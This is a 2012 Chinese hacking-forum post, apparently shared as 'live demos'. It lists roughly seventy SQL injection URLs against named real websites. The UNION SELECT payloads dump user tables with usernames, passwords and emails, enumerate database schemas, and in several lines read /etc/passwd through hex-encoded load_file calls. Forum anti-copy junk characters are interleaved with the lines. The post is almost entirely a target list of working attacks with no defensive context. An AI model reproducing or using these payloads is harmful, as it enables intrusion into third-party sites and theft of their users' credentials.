中国网络渗透测试联盟

标题: 老外php灵活注入方法 [打印本页]
作者: admin    时间: 2012-9-15 14:43
标题: 老外php灵活注入方法
灵活的php注入+活的实例演示! 老外那里挖的
. H! w" G* ?' }6 X, |
4 V* E9 l7 D3 Q3 I  Lhttp://www.ihrc.org.uk/show.php?id=-99+UNION+ALL+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13--
+ r! A. D; l/ C# Ghttp://www.witchcraft.nu/newsitem.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10--
' V1 z, F, l9 dhttp://ccsmi.fas.sfu.ca/newsItem.php?id=-99+UNION+ALL+SELECT+1,2,3,version(),5,6,7,8--
0 P- L  A- C+ z0 [+ Thttp://www.senesco.com/newsitem.php?id=-99+UNION+ALL+SELECT+1,2,3,table_name,5%20from%20information_schema.tables%20where%20table_schema=database ()-- % ?: r3 ]  r0 ?7 h6 `& Y" l
http://www.hpcalc.org/details.php?id=-99+UNION+ALL+SELECT+1,concat_ws(0x3a,id,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29+from+users-- 9 W) Q5 q0 b. q9 c4 q* X
http://www.atlmetal.com/bands/band.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14--
2 V% E8 P+ E  jhttp://www.rocklab.it/band.php?id=-99+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
& F# k2 z/ B% g) Y& dhttp://www.bandlist24.de/band.php?id=-99+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
  ]/ s8 i( o8 Yhttp://www.listenuppresident.com ... +UNION+ALL+SELECT+1,2,3,4,5,6,concat_ws(0x3a,Name,Email,Password),8+from+Members%20limit%20 1,1--
$ @8 q% ?5 `4 l+ c  ghttp://www.hamdrams.co.uk/admin.php?id=-99+UNION+ALL+SELECT+1,2,concat_ws(0x3a,username,user_password),4,5,6,7,8,9,10,11%20from%20phpbb_users-- 8 U% ]- V2 T1 h9 e0 [
http://www.correiagroup.com/agent.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12-- , \, Z: j, u/ n1 ]
http://www.eralincolnrealty.net/ ... +UNION+ALL+SELECT+1,2,3,column_name,5,6,7%20from%20information_schema.columns%20where%20table_nam e='Agent'%20limit%205,1--   C7 X: m7 k( |* c  @* r
http://www.estatesmall.com/real- ... +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15--
1 S; ?' l( p( h- d4 h( Zhttp://www.fourstarrealty.com/agent.php?id=-99+UNION+ALL+SELECT+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20admin-- ! v' _! E. ]9 W; k  K! U' E
http://www.rpmre.com/arealsys/agent.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13-- 1 z7 W/ o$ x, U$ [4 S+ ?
http://internet-shares.com/users.php?id=-99+UNION+ALL+SELECT+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+users%20limit%201,1-- ' Y; l+ z' h5 n  T5 W
http://www.punkarchives.com/users.php?ID=-99+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password,Email),3,4,5,6+from+users--
; n+ p3 S; r" a3 n* m) l  y$ _! khttp://www.memfis.eu/ko7e7a/users.php?id=-99+UNION+ALL+SELECT+1,2,concat_ws(0x3a,nick,name,email,text),4,5,6,7+from+users-- ' k0 `2 Q/ d1 h; u( S; X. ~
http://www.listenuppresident.com ... +UNION+ALL+SELECT+1,2,3,4,5,6,concat_ws(0x3a,Name,Email,Password),8+from+Members%20limit%20 1,1--
7 C: S3 x8 S$ _- xhttp://www.newportcoastbroker.co ... +UNION+ALL+SELECT+1,2,unhex(hex(load_file(0x2F6574632F706173737764)))%20from%20mysql.user--
+ g7 a1 r7 i/ E7 H# Y3 }http://www.gamesector.org/review.php?id=-83+UNION+ALL+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10-- 1 m0 |( ]3 W( z
http://www.bgra.net/2004/review.php?id=-12+UNION+ALL+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26-- 5 ?3 Y  `: Q: A% t2 r
http://www.btne.org/members.php?id=-6+UNION+ALL+SELECT+user(),database(),version()--
" F/ e1 X  t4 {/ Ehttp://cormaci.com/pat.php?id=-2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10-- - Z, {* b5 J$ X  L8 y: C) |
http://www.punbb.fr/styles/style.php?id=-93+UNION+ALL+SELECT+1,0x4E65757472616C69736564,database(),4,5,null,7,8,9-- ! r5 b7 g$ ?8 N! L. D! |
http://www.punbb.fr/styles/style.php?id=-93+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password),database(),4,5,null,7,8,9+from+punbb_users+limit +1,1--
/ b% W) O. z" O2 ?6 m! @, B: @http://travalor.com/hunt.php?id=-3+UNION+ALL+SELECT+1,2,concat_ws(0x3a,username,password,email),4,5,6,7,8,9,10,11,12,13,14,15,16+from+users+limit +0,1--
7 O! U% Y0 C0 @http://www.thefalesteam.com/sell.php?ID=-64+UNION+ALL+SELECT+1,2,3,4,5,6,unhex(hex(concat_ws(0x3a,version(),user(),database()))),8,9,10,11,12--
5 \$ s. W  [) r8 `4 c& u, I' Chttp://www.loffice.org/affiliate ... +UNION+ALL+SELECT+1,concat_ws(0x3a,nom,adresse,tel,mail,password),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,6 4,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+membre+limit+0,1--
' s3 _+ W* N3 |0 M1 Uhttp://haasbuilders.com/auth.php?id=-39+UNION+ALL+SELECT+1,concat_ws(0x3a,project_id,project_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from +projects+where+project_id+=+36--
! P6 m) {, N9 y9 y$ z( }http://ocmusicfest09.com/artist/bio.php?id=-99+UNION+ALL+SELECT+1,2,3,4,5,6,concat_ws(0x3a,user_name,password,password_hint),8,9,10,11,12,13+from +deleterec-- - W  m7 C) Z: R- I8 N
http://www.theatreview.org.nz/re ... +UNION+ALL+SELECT+1,2,3,4,5,concat_ws(0x3a,username,email,password),7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+members+limit+0,1-- 1 I5 }7 F$ Z7 `0 L) j7 w9 n6 d
http://www.thebartend.com/drinks ... +UNION+ALL+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9--
0 |  T3 V6 L4 Y9 e9 ^8 N: ]3 `! mhttp://turfwars2.com/user.php?id=-30+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users+limit+1,1-- * A+ s: {* l# R$ s$ z' i
http://www.lingo.org.za/short.php?id=-40+UNION+ALL+SELECT+1,2,3,4,5,unhex(hex(password)),7,8,9+from+user-- ) [$ U8 V0 I( J( S9 A
http://www.lfks.org/halloffame.php?id=-15+UNION+ALL+SELECT+1,id,3,4,5,6,7+from+halloffame--
" N3 E. d( V$ a0 r- ~2 Ohttp://www.spacefleetonline.com/ ... LL+SELECT+concat_ws(0x3a,user_name,real_name,email,address,password)+from+user+limit+0,1 --
5 [* `; c( ]( h, Q1 Q+ w6 mhttps://www.ncsy.ca/email.php?id=-7+UNION+ALL+SELECT+1,concat_ws(0x3a,version(),user(),database()),3-- : X3 h, {7 ~+ u( w& Y* C% ]
http://www.beaufortbooks.com/books.php?id=-53+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password,email),3,4,5,6,7,8,9,10,11,12,13+from+users+lim it+0,1-- 6 S( J% |5 R+ G0 D
http://www.andytimmons.com/video.php?id=-0003+UNION+ALL+SELECT+1,unhex(hex(concat_ws(0x3a,version(),user(),database()))),3,4,5,6,7,8-- / y& z1 H$ R$ Q& B2 D5 {! C3 ?
http://www.law-and-numbers.de/de ... +UNION+ALL+SELECT+1,null,3,null,0x4E65757472616C69736564,column_name,null,8,9+from+informatio n_schema.columns+limit+0,1--
6 C4 Z  y$ k) ~3 s" Bhttp://www.uwtuib.com/members.php?id=53+UNION+ALL+SELECT+1,2,concat_ws(0x3a,lname,password,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32+from+members+limit+0,1--
8 Z" H- U1 `, N) O( Chttp://www.retailtherapy.tv/video.php?id=-163+UNION+ALL+SELECT+1,2,3,concat_ws(0x3a,id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+members--
; A7 Q3 O3 [& t+ ?3 b$ C) N, @2 mhttp://www.notbbc.co.uk/janet/ms ... +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex(concat_ws(0x3a,version(),user(),d atabase()))),14,15,16--   q8 _: t5 e$ D) U9 R& X
http://www.visitmaldives.com/FAQ/faq.php?Id=-4+UNION+ALL+SELECT+1,2,concat_ws(0x3a,username,password,email),4,5+from+users+limit+0,1--
2 H8 G, E- n( L4 e. P0 v0 _/ u) d9 `http://www.fair-media.info/reque ... ON+ALL+SELECT+unhex(hex(concat_ws(0x3a,version(),user(),database()))),2-- + R  f1 i1 y+ p5 _; E& W# i) n! j
http://www.langsfordcenter.com/o ... +UNION+ALL+SELECT+1,2,concat_ws(0x3a,adminid,password)+from+admin_login+limit+2,1-- : S* f4 V0 f% a
http://supersport-ci.com/scan.php?id=-42+UNION+ALL+SELECT+1,2,3,4,concat_ws(0x3a,version(),database(),user())--
. t% r; C* Y& _0 ~http://www.thediamondworks.co.za ... +UNION+ALL+SELECT+1,2,version(),0x4E65757472616C69736564+from+admin-- ! n% G1 c9 F3 K% K2 u5 y
http://www.nortec.no/stjordal/pc.php?id=-41+UNION+ALL+SELECT+1,2,table_name,4 from information_schema.tables where table_schema=database()--
# |/ [4 R$ K+ c& f+ phttp://www.webhoster4u.de/server ... +ALL+SELECT+version(),database()-- * Y  x) ?( I% E1 T
http://ens.ewi.tudelft.nl/People ... +UNION+ALL+SELECT+1,2,3,4,5,table_name,7,8,9,10,11,12,13%20from%20information_schema.tables%20wher e%20table_schema=database()%20limit%200,1--
& e5 W  ~8 C; ~) ^' Mhttp://www.putridflowers.com/music.php?id=-17+UNION+ALL+SELECT+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
( M, v3 h. {# p" U8 ]https://shop.invictusnetworks.co ... +UNION+ALL+SELECT+1,database(),3,4,5,6,7,8,9,10,11,12--
1 b" W. C8 F1 I4 H+ [! \6 r+ ^http://sandiegoscreensavers.com/ ... +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,concat_ws(0x 3a,discount_type,discount_category,discount_currpct,discount_value,discount_active,discount_ref,discount_expiration),77,78,79,80,81,82,83,84,85,86,87, 88+from+discount-- 9 Y0 I4 s, o4 V+ S1 b& y( X3 c
http://www.schoolbytes.com/summary.php?id=-99+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+users--
7 U  g" i0 {0 L. |: D0 Nhttp://www.toprightcorner.com/bio.php?id=-99+UNION+ALL+SELECT+1,2,3,4,4--
' ]$ ]' V, ]+ f+ q# mhttp://www.wang-li.com/art.php?id=-118+UNION+ALL+SELECT+1,2,load_file(0x2F6574632F706173737764),4--
6 Z  @( P5 O' t# h: Fhttp://www.twisterella.com/indie ... +UNION+ALL+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,0x4E65757472616C69736564,9,10, 11+from+users+limit+0,1--
) Z0 b" P9 e3 n/ [$ ihttp://www.wan-t.cn/www/sec.php?id=-48+UNION+ALL+SELECT+1,2,3,4,5,6,7,0x4E65757472616C69736564--
8 _4 n+ Z$ r0 [, c; W' Hhttp://www.womenastronomers.com/ ... N+ALL+SELECT+concat(username,0x3a,passwor d),2,3,4+from+users---3+UNION+ALL+SELECT+1,null,0x4E65757472616C69736564,4,concat_ws(0x3a,version(),user(),database())-- 1 C( T( r0 S) C& U: M2 ?1 x7 L$ c' q+ a
http://www.fclarchives.org.nz/re ... N+ALL+SELECT+concat(username,0x3a,password),2,3,4+from+users--
( ?" W1 x1 Y( `- ^/ ^6 whttp://www.erdelyikopo.net/text/text.php?id=-5+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,email,username,password,level)+from+members+limit+ 0,1-- & G9 p0 l8 B! N; k4 \. T
http://eng.chiptronic.com/text.php?id=-9+UNION+ALL+SELECT+1,2,3,4,5,6,column_name,8,9,10,11,12-- $ u" E; U* V, N3 ~1 N
http://www.bitepublishing.co.uk/ ... +UNION+ALL+SELECT+1,concat_ws(0x3,user,pass,admin),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24+from+staff--
* Y: ^8 u$ h8 }: `* u: bhttp://www.drivers-download.com/ ... +UNION+ALL+SELECT+1,2,load_file(0x2F6574632F706173737764),4,5,6,7,8,9,10--
/ |# v7 ^* v; s+ p# T0 o5 \+ y& |" I6 zhttp://www.consul.cc/email.php?id=-1068+UNION+ALL+SELECT+null,concat_ws(0x3a,email,password),3,4,5+from+Users+limit+3,1--
: O: y" X- q. }" Thttp://www.f1latam.com/esp.php?id=-8+UNION+ALL+SELECT+1,0x4E65757472616C69736564,3,concat_ws(0x3a,version(),database(),user()),5,6--
1 }; D8 ?( _, X5 M# G  Ihttp://bia2.com/music-review/rev ... +UNION+ALL+SELECT+1,2,3,4,5,version(),7,8,9,10,11,12,13,14--



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2